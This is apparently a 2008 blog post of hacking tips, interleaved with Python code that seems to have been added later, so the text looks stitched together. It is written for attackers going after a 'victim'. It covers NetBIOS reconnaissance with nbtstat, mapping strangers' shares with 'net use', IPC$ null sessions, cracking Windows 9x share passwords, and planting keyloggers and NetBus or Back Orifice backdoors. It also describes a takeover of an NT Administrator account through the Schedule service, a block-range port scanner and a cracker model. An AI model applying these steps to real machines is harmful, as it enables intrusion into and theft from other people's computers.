Friday, June 20, 2008

SOME USEFUL IP TRICKS AND TIPS

This is a compilation of computer tricks, mainly security and privacy related.

Getting IPs:--

To see the IP addresses of all computers you are connected to (web servers, people attempting to get into your computer), go to DOS (Start > Run > type command) and run the netstat command. Type netstat /? for details.
Type netstat -n at the command prompt to see the IP of every computer you currently have a TCP connection to (netstat -a also lists the ports your own computer is listening on; netstat -r prints the routing table, not your connections).

In MSN Messenger (and other programs) everything you type goes through the MSN servers first (they act as a proxy), so you see the server's IP rather than that of the person you are chatting to. You can get round this by sending them a file, as MSN makes file transfers directly between the two computers rather than through its servers.
When you run netstat -n (or -a for a different view) the remote IPs are in the Foreign Address column, with the port after a colon. Different programs use different ports, so you can work out which IPs belong to which program.
Connecting to other computers and what ports are:--

Servers offer a service and send information; clients connect and retrieve it. Simple.
Windows comes with a built-in program to connect to other computers called telnet.
To start Windows telnet: Start menu > Run > type telnet. Click Connect > Remote System.
Ports are doors into computers. Hosts are computer names
(an IP number, or a name that is translated into the IP automatically).
Different programs listen on different ports, but a given service always uses the same well-known port so other computers know which port to connect to. You can get a port list covering all the registered ports, but a basic one is:
11 :- systat (lists who is logged in and what is running; rarely enabled today)
21 :- FTP (File Transfer Protocol)
23 :- Telnet (log in to the computer's command line)
25 :- SMTP (sends mail)
80 :- HTTP (web pages)
There are thousands of different programs using different ports. You can get programs called port scanners which check a computer for open ports up to a certain number, looking for ways in.
Anyway, back to telnet.
Type www.yahoo.com as the host and 80 as the port, then click Connect.
If the screen goes blank and nothing else happens, you're in: you are connected to Yahoo's web server.
You can now type HTTP commands (you are connected to an HTTP server, so it understands HTTP and nothing else). On an FTP server you could type an FTP command such as USER and it would respond; an HTTP server would just wonder what on earth you are on about.
Type GET / HTTP/1.0 then press Enter twice to get the file on the server at / (try /index.html, etc.). The method and version are case-sensitive: get / http/1.0 in lower case is rejected. After sending the page an HTTP/1.0 server closes the connection, so the telnet window will disconnect.
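The same exchange as the telnet session above, done from a raw socket so the request bytes and the reply can be inspected. This is an added example, not part of the original tutorial: because it has to run offline, a constructed local HTTP server on 127.0.0.1 stands in for www.yahoo.com, and the function and class names are my own.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def build_request(host, path="/"):
    """Exactly what you would type into telnet, with the CRLFs made explicit.
    The method and version are case-sensitive: 'get / http/1.0' is rejected."""
    return (f"GET {path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            "User-Agent: raw-socket-example\r\n"
            "Connection: close\r\n"
            "\r\n").encode("ascii")


def parse_response(raw):
    """Split a reply into status line, headers (lower-cased names) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    version, _, rest = lines[0].partition(" ")
    code, _, reason = rest.partition(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"version": version, "status": int(code), "reason": reason,
            "headers": headers, "body": body}


def fetch_raw(host, port=80, path="/", timeout=5.0):
    """Open a TCP connection, send the request and read until the server
    closes the connection (an HTTP/1.0 server closes after one response)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, path))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


class StandInHandler(BaseHTTPRequestHandler):
    """Constructed local server standing in for www.yahoo.com so the example
    runs offline; it serves one fixed page for any path."""
    protocol_version = "HTTP/1.0"
    PAGE = b"<html><body>hello from the stand-in server</body></html>"

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(self.PAGE)))
        self.end_headers()
        self.wfile.write(self.PAGE)

    def log_message(self, *args):  # keep the console quiet
        pass


def start_local_server():
    """Start the stand-in on an ephemeral port; returns (server, port)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), StandInHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_local_server()
    try:
        resp = fetch_raw("127.0.0.1", port, "/index.html")
    finally:
        srv.shutdown()
    print(resp["version"], resp["status"], resp["reason"])
    for name, value in resp["headers"].items():
        print(f"{name}: {value}")
    print(resp["body"].decode())
```

To talk to a real web server, call fetch_raw("www.yahoo.com", 80) instead; the Host header is what lets one server address serve many sites, which plain telnet to port 80 leaves out unless you type it.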
Allowing DOS and regedit in a restricted Windows

See http://blacksun.box.sk/tutorials/format.php3?file=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of DOS and regedit is to open Notepad and type the following:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Save it as something.reg then run it. Simple. (The blank line after REGEDIT4 and the backslashes in the key paths are required, and a dword value is written in hex, conventionally eight digits.)

Making undeletable, unreadable folders

Tested on Windows 95/98
By holding down Alt and typing a number on the numeric keypad (right of the keyboard) you can type special characters. If you hold down Alt, press 1, then let go, you get ASCII character 1. Try some random numbers; the codes go all the way up to 255. Open a DOS prompt and type md (Alt+1+9+4)someword. md is the DOS command to make a directory. Now try to open the directory in Windows: you can't, because the Alt code inserted a character from the DOS code page that the Windows shell does not handle in a file name. To get it back, type ren (Alt+1+9+4)someword someword (ren is the DOS command to rename).

Proxies

Proxies are computers that you connect through, hiding your computer from the site you visit. Most aren't anonymous: they give away your IP by passing it on in a header such as X-Forwarded-For or Via. Some strip it. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in Internet Explorer 5 go to Tools > Internet Options > Connections > Settings. The proxies above are in the format host:port.

Password files
If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:\Windows. Download showpass.zip to view all passwords stored, or rename the files to .bak to delete the passwords.
In Unix, passwords are normally stored in /etc/passwd. This can be viewed using the cat command (prints a file to the screen): cat /etc/passwd. Make sure your passwords are shadowed, i.e. not actually in /etc/passwd: the second field of each line should be an x (or * or ! for a locked account), with the real hashes in /etc/shadow, which must be readable by root only. If hashes appear directly in /etc/passwd, or an ordinary user can cat /etc/shadow, anyone with an account can copy them off and crack them.
Unix passwords are hashed far better than Windows ones (to be fair, Windows 95 isn't designed for multiple users), but can still be cracked with a program called John the Ripper.
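The shadowing check described above, as an added example in Python (not part of the original page): it parses /etc/passwd entries and flags accounts whose hashes sit in the world-readable file, accounts with an empty password field, and extra UID 0 accounts, and then checks that /etc/shadow exists and is not readable by other users. SAMPLE_PASSWD is constructed for the example and the function names are my own.

```python
import os
import stat

# Constructed sample, not a real system's file. Second field meanings:
#   x        hash lives in /etc/shadow (good)
#   * or !   account locked, no password will ever match
#   (empty)  logs in with no password at all
#   $...     a hash sitting in the world-readable file
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$1$saltsalt$QWERTYuiopasdfghjklzx1:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
toor:x:0:0:second root:/root:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Markers that mean "no hash here": shadowed or locked.
LOCKED = ("x", "*", "!", "!!", "*LK*", "NP")


def check_passwd(lines):
    """Return (user, problem) pairs for entries that leak or lack a password."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field: no password needed"))
        elif pw not in LOCKED and not pw.startswith("!"):
            findings.append((user, "hash stored in /etc/passwd, not shadowed"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


def check_shadow_mode(path="/etc/shadow"):
    """/etc/shadow must exist, be owned by root and be unreadable by 'other'
    (0640 root:shadow or 0600 root:root are the usual settings)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [(path, "missing: passwords are not shadowed")]
    findings = []
    if st.st_mode & stat.S_IROTH:
        findings.append((path, "world-readable: any user can copy the hashes"))
    if st.st_uid != 0:
        findings.append((path, "not owned by root"))
    return findings


def audit(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run both checks against a live system."""
    with open(passwd_path) as f:
        return check_passwd(f) + check_shadow_mode(shadow_path)


if __name__ == "__main__":
    for user, problem in check_passwd(SAMPLE_PASSWD.splitlines()):
        print(f"{user}: {problem}")
    if os.path.exists("/etc/passwd"):
        for item, problem in audit():
            print(f"{item}: {problem}")
```

Run it as root on a real box to audit the live files; as an ordinary user, the fact that audit() can open /etc/shadow at all is itself the finding.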



Note- This tutorial may bear a resemblance to tutorials written by other authors

hack using NetBIOS (hacking someone's remote computer)

I have written this tutorial keeping in mind that readers with only basic knowledge will also be able to understand how hackers hack using NetBIOS.

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have worked on a LAN using a Microsoft Windows operating system (Windows 98, Windows Me, Windows NT, etc.), you will have clicked on "Network Neighborhood" to reach the computers attached to your network, and seen their names listed. Do you know what exactly happens when you click on Network Neighborhood? Your computer asks NetBIOS for the names of the computers attached to the network, and NetBIOS returns the names that have been registered. In short, NetBIOS gives out various information about the computers on a network. This includes:

Name of the computer

Username of whoever is logged on

Domain or workgroup

Which NetBIOS services the computer runs (for example the Messenger service, or file and printer sharing)

and many others.

Like any other service it works on a port. The NetBIOS name service, which answers the queries below, uses UDP port 137; the NetBIOS session service used for file and printer sharing has been assigned port 139 (TCP).


THE NBTSTAT COMMAND

You can manually interact with NetBIOS with the help of the NBTSTAT command. To use this command click on the Start button, select Run... and type "command" without the quotes to launch the MS-DOS command prompt. Alternatively you may click on the Start button, go to Programs and select Command Prompt (on Windows NT, 2000 and XP the program to run is cmd). Once you are in the command prompt you can exit by typing EXIT. To switch the command prompt to full-screen mode press ALT+ENTER; press ALT+ENTER again to get the window back. When you have launched the command prompt you will see

c:\windows>

If you get a different directory after c:\ don't worry, just keep going; all the required commands will work fine.

Now let's play with the NBTSTAT command.

If you want more help from MS-DOS about this command, type nbtstat /? at the prompt, i.e.

c:\windows>nbtstat /?

If you want to get the NetBIOS information of your own computer type the following command (upper-case -A means the argument is an IP address; lower-case -a takes a computer name instead)

c:\windows>nbtstat -A 127.0.0.1

This command will list the NetBIOS information. A typical example:

NetBIOS Remote Machine Name Table

   Name             Number  Type  Usage
   ======================================================
   workgroup        00      G     Domain Name
   my_computer      03      U     Messenger Service
   myusername       03      U     Messenger Service

   MAC Address = 00-02-44-14-23-E6

Please note that we used 127.0.0.1 as our IP address. This address is called the "loopback" address because it always refers to the computer you are using.

This example is mostly self-explanatory, so we need not go into every detail. What we need to know about are the Name and Number columns. Name is the NetBIOS name, and Number is a hexadecimal suffix (written <00>, <03>, <20> by newer versions of nbtstat) that tells you which service registered that name. Type U is a unique name belonging to one machine; G is a group name shared by the whole workgroup or domain. You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -A ipaddress

Example - To get the NetBIOS names of a computer having the IP address 203.195.136.156, we shall use the command

NOTE - 203.195.136.156 may be an active IP address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -A 203.195.136.156


WHAT YOU NEED TO HACK
All you need is a Windows-based operating system such as Windows 98 or Me (though I prefer Windows NT, 2000 or XP) and an internet connection.


TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



Searching for a victim

You may manually search for victims by first using nbtstat -A ipaddress and then net view \\ipaddress. If at first you don't succeed, step to the next IP address until you find a suitable one. You may also use a port scanner. A port scanner is simply software that checks a block of IP addresses, say 192.168.0.1 to 192.168.0.255, for one or more open ports. "Orge" is a port scanner that also gives the NetBIOS names of the remote computer.
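An added example (my own code, not the tutorial's and not Orge) of the port scanner described here and in the ports section earlier: a threaded TCP connect scan of a list of ports, with a helper that sweeps a whole block of addresses and labels what it finds. The listener() and free_port() helpers exist only so the scan has a known open and closed port on localhost to run against offline; the function names are assumptions for illustration.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

# The ports from the list earlier on this page, plus the NetBIOS/SMB ports
# the rest of this tutorial depends on.
SERVICES = {11: "systat", 21: "ftp", 23: "telnet", 25: "smtp", 80: "http",
            135: "msrpc", 137: "netbios-ns", 139: "netbios-ssn",
            445: "microsoft-ds"}


def probe(host, port, timeout=1.0):
    """TCP connect scan of one port. A completed handshake means open;
    refused, timed out and unreachable are all reported as closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(host, ports, timeout=1.0, workers=64):
    """Probe many ports concurrently and return the open ones, sorted."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(p for p, is_open in zip(ports, results) if is_open)


def scan_block(network, ports, timeout=1.0):
    """Sweep every host in a block such as '192.168.0.0/24'; returns
    {ip: [open ports]} for the hosts with at least one open port."""
    found = {}
    for ip in ipaddress.ip_network(network, strict=False).hosts():
        open_ports = scan(str(ip), ports, timeout)
        if open_ports:
            found[str(ip)] = open_ports
    return found


def describe(open_ports):
    """Label open ports with the service normally behind them."""
    return {p: SERVICES.get(p, "unknown") for p in open_ports}


def listener(host="127.0.0.1"):
    """Constructed fixture: a socket listening on an ephemeral port, so the
    scanner has a known open port to find. Returns (socket, port)."""
    s = socket.socket()
    s.bind((host, 0))
    s.listen(5)
    return s, s.getsockname()[1]


def free_port(host="127.0.0.1"):
    """Constructed fixture: a port that nothing is listening on."""
    s = socket.socket()
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    sock, open_port = listener()
    try:
        print(describe(scan("127.0.0.1", list(SERVICES) + [open_port])))
    finally:
        sock.close()
```

A connect scan completes the handshake, so every probe shows up in the target's logs; that is the trade-off for not needing raw sockets. Only scan hosts you are authorised to test.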



Lets Hack - Part 1 Remotely reading/writing to a victim's computer

Believe it or not, NetBIOS is the easiest way to break into somebody's computer. However, there is a condition that must be satisfied before you can hack: the victim must have enabled File and Printer Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now let us take an example. Suppose you know an IP address that has File and Printer Sharing enabled, and suppose it happens to be 203.195.136.156.
The command you will use to view the NetBIOS names is

c:\windows>nbtstat -A 203.195.136.156

Let us suppose that the output comes out to be

NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    user           <00>  UNIQUE      Registered
    workgroup      <00>  GROUP       Registered
    user           <03>  UNIQUE      Registered
    user           <20>  UNIQUE      Registered

    MAC Address = 00-02-44-14-23-E6

The unique name with suffix <20> is the File Server Service, which shows that the victim has enabled File and Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. No <20> entry appears in the table. This shows that the victim has not enabled File and Printer Sharing.

2. You get "Host not found". This shows that the NetBIOS name service (UDP port 137) did not answer: it is blocked by a firewall, the machine is not running NetBIOS over TCP/IP, or the IP address doesn't exist.

---------------------------------------------------------------------------------------------------------
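What nbtstat -A actually sends is a single NetBIOS Node Status Request to UDP port 137, and the table above is the decoded reply. Here is an added example (not from the original tutorial, and not nbtstat's code) that builds that request, parses a reply into the same name/suffix/type table and applies the <20> check. sample_response() is a constructed reply mirroring the table above, not a capture; query() sends the request to a live host and is not exercised offline; the function names are my own.

```python
import socket
import struct

NBNS_PORT = 137       # NetBIOS Name Service (UDP); nbtstat -A talks to this
NBSTAT = 0x0021       # record type of a Node Status request/response

# Suffix -> service, as nbtstat prints it. <20> is the File Server Service
# that "File and Printer Sharing" registers.
SUFFIXES = {
    0x00: "Workstation Service / Domain Name",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}


def encode_name(name):
    """First-level encoding (RFC 1001 section 14.1): pad the name to 16 bytes,
    then write each byte as two nibbles, each added to 'A'."""
    raw = name.encode("ascii").ljust(16, b"\x00")
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def build_node_status_request(txid=0x1234):
    """The 50-byte datagram: header with one question, the '*' wildcard
    name, type NBSTAT, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = b"\x20" + encode_name("*") + b"\x00"
    return header + question + struct.pack(">HH", NBSTAT, 0x0001)


def parse_node_status_response(data):
    """Decode the reply into the name table nbtstat shows, plus the MAC."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a name-service response carrying an answer")
    pos = 12
    while data[pos] != 0:            # skip the encoded name in the answer RR
        pos += 1 + data[pos]
    pos += 1
    rtype, _rclass, _ttl, _rdlen = struct.unpack_from(">HHIH", data, pos)
    pos += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected record type {rtype:#06x}")
    num_names = data[pos]
    pos += 1
    names = []
    for _ in range(num_names):       # 18 bytes each: 15 name, 1 suffix, 2 flags
        entry = data[pos:pos + 18]
        pos += 18
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": entry[15],
            "group": bool(nflags & 0x8000),    # G bit: group vs unique
            "active": bool(nflags & 0x0400),   # ACT bit
            "usage": SUFFIXES.get(entry[15], "unknown"),
        })
    mac = "-".join(f"{b:02X}" for b in data[pos:pos + 6])  # statistics start with the MAC
    return {"txid": txid, "names": names, "mac": mac}


def file_sharing_enabled(table):
    """nbtstat's <20> test: an active, unique File Server Service name."""
    return any(n["suffix"] == 0x20 and not n["group"] and n["active"]
               for n in table["names"])


def query(ip, timeout=2.0):
    """Send the request to a live host (needs UDP/137 reachable)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    return parse_node_status_response(data)


def name_entry(name, suffix, flags):
    """One 18-byte NODE_NAME entry (used to build the constructed reply)."""
    return name.encode("ascii").ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)


def sample_response(txid=0x1234):
    """Constructed reply (not a capture) mirroring the table in the text."""
    entries = (name_entry("USER", 0x00, 0x0400) + name_entry("WORKGROUP", 0x00, 0x8400)
               + name_entry("USER", 0x03, 0x0400) + name_entry("USER", 0x20, 0x0400))
    statistics = bytes.fromhex("0002441423E6") + b"\x00" * 40
    rdata = bytes([4]) + entries + statistics
    answer = (b"\x20" + encode_name("*") + b"\x00"
              + struct.pack(">HHIH", NBSTAT, 0x0001, 0, len(rdata)) + rdata)
    return struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0) + answer


if __name__ == "__main__":
    table = parse_node_status_response(sample_response())
    for n in table["names"]:
        kind = "GROUP" if n["group"] else "UNIQUE"
        print(f"{n['name']:<15} <{n['suffix']:02X}>  {kind:<7} {n['usage']}")
    print("MAC Address =", table["mac"])
    print("File and Printer Sharing:", file_sharing_enabled(table))
```

Because the request is a single unauthenticated UDP datagram, this is also why a host that blocks UDP/137 at its firewall shows up as "Host not found" even when port 139 is open.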

Now our next step would be to view the drives or folders the victim is sharing.

We will use the command

c:\windows>net view \\203.195.136.156

Let us suppose we get the following output

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name   Type    Used as   Comment
------------------------------------------------
CDISK        Disk

The command completed successfully.

The type "Disk" shows that the victim is sharing a disk named CDISK. You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name   Type    Used as   Comment
------------------------------------------------
HP-6L        Print

The type "Print" shows that the victim is sharing a printer named HP-6L.

If we can connect to the victim's shared hard disks, folders or printers, we will be able to read from and write to those folders or disks, or even print on the remote printer! Now let us connect to the victim's hard disk or printer.

So far we know that there is a computer whose IP address is 203.195.136.156, that File and Printer Sharing is enabled on it, and that its shared hard disk is named CDISK.

Now we will connect our computer to that hard disk. After we have connected successfully, a drive letter will be created on our computer, and double-clicking it will show the contents of the remote drive. If we have connected our new drive to the victim's share CDISK, our drive will have the same contents as CDISK.

Lets do it.

We will use the NET command to do our work.

Suppose we want to make a drive k: on our computer and connect it to the victim's share; we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k with any other free drive letter.

If the command is successful we will get the confirmation

The command completed successfully.

Now just double-click the My Computer icon on your desktop and you will be a happy hacker!

We have just created a new drive k:. Just double-click it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


Cracking share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker called "PQWAK". All you have to do is enter the IP address and the share name and it will recover the password within seconds. It does not decrypt anything: it exploits a bug in the share-level password check of Windows 9x, where the server compared only as many characters as the client sent, so the password can be guessed one character at a time. Please note that this only works if the remote operating system is one of

Windows 95

Windows 98

Windows Me
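To show why a character-at-a-time guess beats a share password in seconds, here is an added example (my own model, not PQWAK's code and not an SMB implementation) of the vulnerable length-limited comparison beside a correct one, with a cracker run against both. The class and function names are assumptions for illustration; the password is a constructed value.

```python
import hmac
import string

# Bytes the cracker will try at each position.
ALPHABET = (string.ascii_letters + string.digits + string.punctuation).encode("latin-1")


class VulnerableShare:
    """Models the Windows 9x share-level check: the server compared only as
    many bytes as the client sent, so a one-byte guess is accepted as soon
    as that byte matches (constructed model, not an SMB implementation)."""

    def __init__(self, password):
        self._pw = password.encode("latin-1")
        self.attempts = 0

    def check(self, guess):
        self.attempts += 1
        return len(guess) > 0 and self._pw[:len(guess)] == guess


class HardenedShare(VulnerableShare):
    """Correct check: the whole password, compared in constant time."""

    def check(self, guess):
        self.attempts += 1
        return hmac.compare_digest(self._pw, guess)


def crack(share, max_len=16):
    """Recover the password one byte at a time by extending the longest
    accepted prefix; returns None if the server gives no byte-level oracle."""
    found = b""
    for _ in range(max_len):
        for c in ALPHABET:
            candidate = found + bytes([c])
            if share.check(candidate):
                found = candidate
                break
        else:
            break                      # nothing extends it: the prefix is complete
    # Under the bug every prefix is accepted, so a non-empty result is the
    # whole password (a byte outside ALPHABET would stop the search early).
    return found if found and share.check(found) else None


if __name__ == "__main__":
    weak, strong = VulnerableShare("s3cret!"), HardenedShare("s3cret!")
    print("vulnerable:", crack(weak), "after", weak.attempts, "attempts")
    print("hardened:  ", crack(strong), "after", strong.attempts, "attempts")
```

Against the vulnerable check the work is at most (length + 1) times the alphabet size, a few hundred guesses here; against the fixed check the same cracker gets nowhere and the only route is the full alphabet to the power of the length.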




Using IPC$ to hack Windows NT, 2000, XP

Now you must be thinking of something that can crack share passwords on NT-based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not a password cracker at all. It is the hidden inter-process communication share that every NT-based system exposes, and connecting to it with an empty username and password (a "null session") gives anonymous access without asking for a password.

We hackers use IPC$ in this way

c:\windows>net use \\123.123.123.123\ipc$ "" /user:""

No drive letter is used here: IPC$ is not a disk, so nothing appears in My Computer and you won't be able to get at the victim's shared drives through it. What you can do is gather valuable information such as the names of all the user accounts, users that have never logged on, and other such details. One tool that uses the IPC$ method is "Internet Periscope". Another is "enum"; it's my favorite tool, though it runs from the command prompt.



Penetrating into the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his mp3 songs, and more...

But if you think like a hard-core hacker you would like to play some dirty tricks: install a key logger, install a back-door Trojan like NetBus or Back Orifice, or delete or copy some files. All these tasks involve writing to the victim's hard disk, for which the share must grant you write permission; a read-only share will refuse.






Lets Hack - Part 2 Denial of service attack

This type of attack is meant for the more technical reader, because it involves using the Linux operating system and compiling C source files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder or securityfocus and compile it yourself.

Note- This tutorial may bear a resemblance to tutorials written by other authors

Administrator Password Hack

If you have lost the Administrator password, you must have the following to recover it:

1. A regular user account that can log on locally to the Windows NT Workstation, Server or PDC you are recovering. If you already have an alternate install of NT, skip to The Process, step 2.

2. The Windows NT CD-ROM and setup diskettes (winnt /ox makes them from the CD-ROM).

3. Enough room to install a temporary copy of NT (Workstation will suffice, even to recover a PDC).

4. Your latest Service Pack.

The Process:

(Steps 3 to 15 create an AT job on the temporary install that opens CMD, then copy that job into the original installation's registry, so the original's Schedule service launches CMD with its own privileges at the chosen time.)

1. Install a copy of Windows NT as TEMPNT, on any drive. Install your latest Service Pack.

2. Boot the alternate install.

3. At a command prompt, type AT HH:MM /INTERACTIVE CMD /K where HH:MM is 10 minutes from now (or however much time you need to complete the remaining steps and log on to your primary installation).

4. Use Regedt32 to edit:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule

5. Double-click Schedule and click its one sub-key.

6. Double-click the Schedule value name in the right-hand pane and copy the REG_BINARY string to the clipboard.

7. Select HKEY_LOCAL_MACHINE and choose Load Hive from the Registry menu.

8. Navigate to your original installation's \System32\Config folder and double-click System.

9. At the Key Name prompt, type ORIGSYS.

10. Navigate to ORIGSYS\Select and note the value of Current, i.e. n.

11. Browse to ORIGSYS\ControlSet00n\Services\Schedule and, if Start is not 0x2, set it to 0x2 (automatic start).

12. With Schedule selected, choose Add Key from the Edit menu.

13. Type 001 in Key Name and click OK.

14. Select 001 and Add Value named Command, type REG_SZ, with the string CMD /K.

15. Select 001 and Add Value named Schedule, type REG_BINARY, and paste the string from step 6.

16. Select ORIGSYS and choose Unload Hive from the Registry menu.

17. Use Control Panel > System > Startup... to make your original install the default.

18. At a CMD prompt:
attrib -r -s -h c:\boot.ini
edit c:\boot.ini
Either change the id of the TEMPNT lines to Maint 4.0 on both entries if you intend to keep this maintenance install, or delete them. Then:
attrib +r +s +h c:\boot.ini

19. Shut down and restart your original install.

20. Log on as your user account and wait for HH:MM from step 3.

21. When the CMD prompt opens it will be running in the context of the Schedule service's account, either the System account or an administrative account. If this machine is NOT the PDC, type MUSRMGR.EXE; if it is the PDC, type USRMGR.EXE. If you get an error, click Yes and type your domain name.

22. Set the Administrator password and log off.

23. Log on as Administrator.

24. If you deleted the TEMPNT entries in step 18, delete \TEMPNT.



Note: If the Schedule service runs in the context of a Domain Administrator on any member workstation, all you need to recover the PDC Administrator password is a network logon to that workstation.



This tutorial may bear a resemblance to tutorials written by other authors
